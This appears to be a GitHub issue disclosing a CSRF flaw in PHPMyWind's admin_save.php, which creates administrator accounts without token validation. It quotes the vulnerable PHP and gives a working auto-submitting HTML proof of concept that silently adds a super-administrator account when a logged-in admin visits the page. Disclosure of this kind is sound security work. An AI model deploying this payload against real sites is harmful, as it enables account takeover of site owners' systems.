A CSRF vulnerability that can add the administrator account #14

J1anCan · 2020-07-12T02:59:23Z

There is no Token authentication when adding administrator users.
/admin/admin_save.php
The core code is as follows

if($action == 'add')
{
	if($cfg_adminlevel > 1 and $levelname == 1)
	{
		ShowMsg('非法的操作，不能创建超级管理员！', '-1');
		exit();
	}
	

	$password  = md5(md5($password));
	$loginip   = '127.0.0.1';
	$logintime = time();

	$sql = "INSERT INTO `$tbname` (username, password, nickname, question, answer, levelname, checkadmin, loginip, logintime) VALUES ('$username', '$password', '$nickname', '$question', '$answer', '$levelname', '$checkadmin', '$loginip', '$logintime')";
	if($dosql->ExecNoneQuery($sql))
	{
		header("location:$gourl");
		exit();
	}
}

After the administrator logs in, just click on the attack page, and the administrative user will be added.
poc：

<html>
<body>
<form name="form" method="post" action="http://localhost/phpmywind/admin/admin_save.php">
		<input type="hidden" name="username" value="csrf">
		<input type="hidden" name="password" value="123456">
		<input type="hidden" name="repassword" value="123456">
		<input type="hidden" name="question" value="0">
		<input type="hidden" name="levelname" value="1">
		<input type="hidden" name="checkadmin" value="true">
		<input type="hidden" name="action" value="add">
		<input type="submit" value="Submit request" />
</form>
</body>
 <script>
   setInterval("document.all.form.submit()",1)
 </script>
</html>

The text was updated successfully, but these errors were encountered:

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

A CSRF vulnerability that can add the administrator account #14

A CSRF vulnerability that can add the administrator account #14

J1anCan commented Jul 12, 2020

A CSRF vulnerability that can add the administrator account #14

A CSRF vulnerability that can add the administrator account #14

Comments

J1anCan commented Jul 12, 2020